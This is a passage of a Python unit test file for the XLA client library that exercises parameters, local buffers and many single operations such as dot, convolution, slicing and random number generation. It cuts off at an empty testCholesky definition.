for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(ComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486): re-enable when shape check is resolved
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
